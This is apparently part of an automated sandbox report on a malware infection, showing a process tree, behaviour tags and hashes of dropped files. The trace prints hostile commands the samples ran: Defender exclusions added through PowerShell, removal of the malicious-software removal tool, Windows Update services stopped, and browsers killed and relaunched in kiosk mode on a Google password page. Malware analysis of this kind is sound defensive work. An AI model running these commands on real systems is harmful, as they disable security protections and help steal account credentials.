                                                                                                                              "C:\Windows\system32\ipconfig.exe" /flushdns
                                                                                                                              7⤵
                                                                                                                              • Gathers network information
                                                                                                                              PID:3488
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                              7⤵
                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • outlook_office_path
                                                                                                                              • outlook_win_path
                                                                                                                              PID:208
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1008006001\5c0cd8e587.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1008006001\5c0cd8e587.exe"
                                                                                                                        4⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:6312
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1008007001\1d4f9120e5.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1008007001\1d4f9120e5.exe"
                                                                                                                        4⤵
                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Identifies Wine through registry keys
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5904
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1008008001\bf05d322b2.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1008008001\bf05d322b2.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:6152
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3276
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:6640
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5664
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5300
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:792
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                          5⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:4460
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                            6⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:5876
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {803b9bd0-4447-4b25-b192-9e1513b7b9ad} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" gpu
                                                                                                                              7⤵
                                                                                                                                PID:7148
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2424 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8867377c-9bcf-4405-93e1-4c4092fb391d} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" socket
                                                                                                                                7⤵
                                                                                                                                  PID:1344
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3216 -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c6a8e83-3820-4bc6-8139-6d29960f767e} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" tab
                                                                                                                                  7⤵
                                                                                                                                    PID:1876
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2728 -childID 2 -isForBrowser -prefsHandle 3572 -prefMapHandle 3720 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7ed2d33-7b00-44da-b939-ed80ea7ec389} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" tab
                                                                                                                                    7⤵
                                                                                                                                      PID:4676
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4308 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4212 -prefMapHandle 4248 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6ac2777-7c0f-498f-a74a-22f3e7104e66} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" utility
                                                                                                                                      7⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      PID:5088
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af475fb6-59a1-4439-911d-421a14604cc1} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" tab
                                                                                                                                      7⤵
                                                                                                                                        PID:792
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5616 -childID 4 -isForBrowser -prefsHandle 5608 -prefMapHandle 5604 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46c36b0e-865c-45ac-8ee4-8a8a8db27fe3} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" tab
                                                                                                                                        7⤵
                                                                                                                                          PID:5196
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 960 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94269d00-87cf-485f-aeac-4297b321ad4d} 5876 "\\.\pipe\gecko-crash-server-pipe.5876" tab
                                                                                                                                          7⤵
                                                                                                                                            PID:3808
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1008009001\605473106d.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1008009001\605473106d.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                      • Windows security modification
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6136
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:3544
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                    PID:3744
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:3904
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:3532
                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:4548
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4552
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:1292
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                              1⤵
                                                                                                                                                PID:936
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:3100
                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3624
                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5076
                                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                      1⤵
                                                                                                                                                        PID:788
                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2556
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1924
                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:5024
                                                                                                                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:220
                                                                                                                                                            • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                              C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:7156
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:7116
                                                                                                                                                                • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                  C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5840
                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:5904
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5524
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5080
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5980
                                                                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1984
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:6332
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:5040
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2200
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1916
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2444
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2788
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                PID:6512
                                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Power Settings
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:4300
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:6960
                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:3264
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5156
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:556
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5852
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:7080
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7076
                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:5320
                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4448
                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                          dialer.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:4316
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1828 -ip 1828
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:6860

                                                                                                                                                                                        Network

                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                        Downloads

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          3KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          556084f2c6d459c116a69d6fedcc4105

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          bc5002d510782e63c5b419e689526382

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          59d766e6141ca62a507a8774f93b009300cd6fe9

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          58fcdc6d1716dd90140c36acf6185c1e814c43eba324dd972c49d52652697d49

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          69304819a9ca7695876ca5e1638b7471ef9d922003cfea537ee8261da13af1b95a8d5ecc6b1f8155149b59f058b444151a66a993607bd8e25ba308915ca29dc7

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          5e0b043ae837c3a17771dddc6e292c4f

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          8e2b006e8202bde3046020902ca4613bfa303612

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          a33a2506b15ab9847df0f1d8adbc6aa7d12bb2b52ee8d2bc102dc80d20ff71e0

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          9d7c646348e8a02a3fae1e0f7fc519e933ba692cf217ef570625de82994551b2a617b437e4109b6f620d455eb3f8df5113ce8390d30dd21d9e6fea364b40b35c

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          19KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          65b864cf83f1994bcad4ece22004da13

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          efc73b438a0c75e8f2a8ca4bdce030250ee036ab

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          20a02dd41c3112ad40e5fee990c3a96cf7dd4e353306de9b45ef37dbcae61eac

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          c2367e6ae1cc63b670a5b62337f261d2c77fa6cad16511b15161cc98bab66fef88a97c90c68066e218aa5cb89352900bd7b74aa4e4b47bac9cc0ba19f14f48b9

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          13KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          df683b6d13ca2bab16236b70e4e7ee29

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          d5ef65ae46fd355d91ae42f267cc3ab5fd567f5e

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          74393ebba45faf66a6f946d22faebf6cc6a24e5ce2db547a46588877f66b151c

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          a1b00d7941b8928e0d60ca8db8fa96b470489343daa84a12839e7afb90f619cf6844ed258e947d75049791a659a350e59099baa68946658dc9b07769612bf44a

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1007999001\f46c1711ea.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.2MB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          40cb4053a584486a21a109ffb44933c9

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          07a94039a6176646ecdb0a5b0fab59b632bdbd18

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          71b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          58356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          50KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          666248c216a3f63828f739839230f9f6

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          13690837235053762a538b4c5b2b601ec9f6bb22

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1008006001\5c0cd8e587.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.8MB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          6380b8ca2f9bfc1d86617a3a7fd924f1

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          04ff7e660a59bd2c45098e99a3fd5bff614d2d57

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          8b7d7728ac97e310b2b01ed34967a8eddb0663427d9d0be4ecdb6b1568194aa2edb1232daeced175d71e2dd7c6c453204b4f004ba8706ee4790473d86f9ab033

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1008007001\1d4f9120e5.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.7MB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          81380b3f4700458353f68405ba69f471

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          2c51c11246200de63ac0121df7fc94545f0aef38

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          5b039e26817ac3dde3340af44180e943e7823936cb537342e8a818e5d8705908

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          a59cd918a59a2aef818e2974579026a1ab344bfe658e23954550b6c2d44df2285d5365cd60d4086c60d4234ed8616546826d9ed66634150f0d4fde8702e0ff3f

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1008008001\bf05d322b2.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          901KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          7fa8aa5776c44304def2ed20c16d29ec

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          0fc5106137c34600f7bbb963a6c73b3f4911f1a3

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          69a5b88b0132f61fcd531761b93e11ee2d8a53228431b295c6827f314fd47dbd

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          6eb521c820d034683a014f4fa998055c339114182512c3241330e5b8a43843b01c478cf8cb8d1e51b767c888da9fbcb8a7ee900287b1d359b7ead2ef6eeb2aa8

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1008009001\605473106d.exe

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          dd9ad82b68a13333652866431f0ee8d9

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          23b45a0875b428204f4f3448442aae222274612f

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          8ba30fce56df7cd2c37d70dda3dbde19b2d5ff5c3896e791e484f2a1838fd106

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          35311c88fd3fa87f3ecbb4442c77d349673fcf8f7d6b68ba781efd1a95ef562a26dc3623437304f1b69bc128f8dce28656cf28a1e79d2ff0528d6c93def13ee7

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_smreyna2.ewi.ps1

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          60B

                                                                                                                                                                                          MD5

                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

